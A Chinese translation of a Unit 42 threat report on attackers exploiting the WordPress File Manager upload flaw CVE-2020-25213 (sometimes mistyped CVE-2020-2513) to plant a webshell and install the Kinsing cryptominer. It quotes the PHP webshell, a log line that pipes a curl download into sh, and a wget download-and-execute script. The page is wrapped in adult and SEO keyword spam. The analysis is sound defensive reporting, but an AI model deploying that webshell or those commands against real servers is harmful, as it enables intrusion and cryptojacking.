成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

CVE-2020-25213漏洞在野利用

安全
2020年12月,Unit 42研究人員發現有攻擊者嘗試利用WordPress File Manager(文件管理器)插件中的文件上傳漏洞。

[[381498]]

 2020年12月,Unit 42研究人員發現有攻擊者嘗試利用WordPress File Manager(文件管理器)插件中的文件上傳漏洞。攻擊者成功利用該漏洞可以以任意文件名和擴展上傳任意文件,引發目標web 服務器上的遠程代碼執行。

攻擊者利用該漏洞利用來安裝webshell,然后該webshell 被用來安裝Kinsing惡意軟件,該惡意軟件會從H2miner 家族運行惡意加密貨幣挖礦機。Kinsing是用Golang編程語言開發的,最終的目標是用于容器環境中的加密貨幣劫持攻擊。

CVE-2020-2513和Webshells

CVE-2020-2513漏洞產生的原因是WordPress文件管理器插件將elFinder庫的connector.minimal.php.dist 文件擴展名改成了.php,所以該文件可以直接執行。但是因為該文件沒有訪問限制,因此任何瀏覽該web 服務器的用戶都可以執行。該文件包含無需認證就上傳文件到web服務器的機制。由于該漏洞,任何人都可以上傳文件,因此惡意攻擊者就利用該機制來上傳webshell,可以用來進行下一步的惡意軟件安裝或加密貨幣挖礦活動。

攻擊鏈

研究人員調查發現被攻擊的機器中有以下日志信息,其中發給Web服務器的HTTP POST請求有:

  1. [19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36” 

該請求用來上傳webshell。研究人員進一步分析發現了惡意webshell:

  1. [19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411 

從上圖中可以發現,該webshell名為k.php,并提供了一個執行的命令。該webshell 本身非常簡單,是在web 服務器上明文保存的,并且不含有任何的混淆和認證措施:

  1. < ?php if(isset($_REQUEST['cmd']){ echo "< pre >"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "< /pre >"; die; }? > 

研究人員進一步分析返回給webshell k.php的HTTP GET請求,發現該命令調用了下載名為wpf.sh文件的curl 命令,并執行該文件。

研究人員從攻擊者的C2 服務器中獲得了該shell腳本,文件內容如下:

  1. $WGET $DIR/kinsing http://X.X.X.X/kinsing 
  2. chmod +x $DIR/kinsing 
  3. … 
  4. SKL=wpf $DIR/kinsing 
  5. … 

 wpf.sh文件是一個使用wget下載Kinsing的腳本,給予該腳本執行權限,并執行。

總結

研究人員發現了WordPress 文件管理器遠程代碼執行漏洞 CVE-2020-25213 的在野利用。攻擊者利用該漏洞利用來安裝Kinsing惡意軟件,運行一個H2miner家族的惡意加密貨幣挖礦機。Kinsing的最終目標是用于容器環境的加密貨幣劫持攻擊。

本文翻譯自:https://unit42.paloaltonetworks.com/cve-2020-25213/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2022-08-10 18:18:20

網絡安全漏洞CISA

2021-05-26 09:46:26

Android漏洞

2025-04-11 08:35:00

漏洞網絡安全終端安全

2025-02-28 10:23:33

2021-02-07 14:39:22

Falco漏洞安全工具

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2020-10-12 10:28:15

漏洞內存破壞網絡攻擊

2021-09-09 15:40:46

零日漏洞IE瀏覽器微軟

2021-08-10 08:22:21

漏洞網絡安全網絡攻擊

2014-11-19 11:05:45

2022-04-27 15:55:40

黑客漏洞網絡攻擊

2020-07-15 10:35:25

漏洞攻擊網絡安全

2020-12-11 11:18:43

MiTMKubernetes漏洞

2020-12-28 10:23:00

中間人攻擊漏洞Kubernetes

2023-07-07 15:44:12

漏洞網絡安全

2024-08-19 15:07:39

2025-05-13 08:28:00

漏洞終端安全系統安全

2021-09-10 11:41:20

漏洞Windows 微軟

2020-10-25 09:39:49

漏洞分析

2020-10-09 08:00:00

漏洞
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 九九热精品免费 | av国产精品毛片一区二区小说 | 欧美日韩在线电影 | 91精品国产色综合久久不卡98口 | 成人精品在线观看 | 精品欧美黑人一区二区三区 | 欧美性猛交一区二区三区精品 | 国产亚洲成av人在线观看导航 | 亚洲成人精品 | 国产精品国产三级国产aⅴ原创 | 国产高清精品在线 | 久久久性 | 97久久久久久 | 成人在线精品视频 | 日韩国产高清在线观看 | 欧美片网站免费 | 日韩欧美在线不卡 | 欧美成年网站 | 欧美激情区 | 国产在线不卡视频 | 精品欧美一区二区三区精品久久 | 午夜视频免费在线观看 | 五月激情婷婷六月 | 国产成人短视频在线观看 | 亚洲国产精品99久久久久久久久 | 国产一级一级毛片 | 美女久久久久久久 | 国产一区二区三区在线 | 中文字幕第一页在线 | 在线观看成人小视频 | 三级在线观看 | 亚洲一区二区三区在线播放 | 国产一区二区三区 | 日韩欧美精品在线 | 国产乱xxav| 亚洲一区二区三区桃乃木香奈 | 日韩一区二区三区在线看 | 一级黄色生活视频 | 国产精品美女久久久久久久网站 | 国产在线精品一区二区 | 一本色道精品久久一区二区三区 |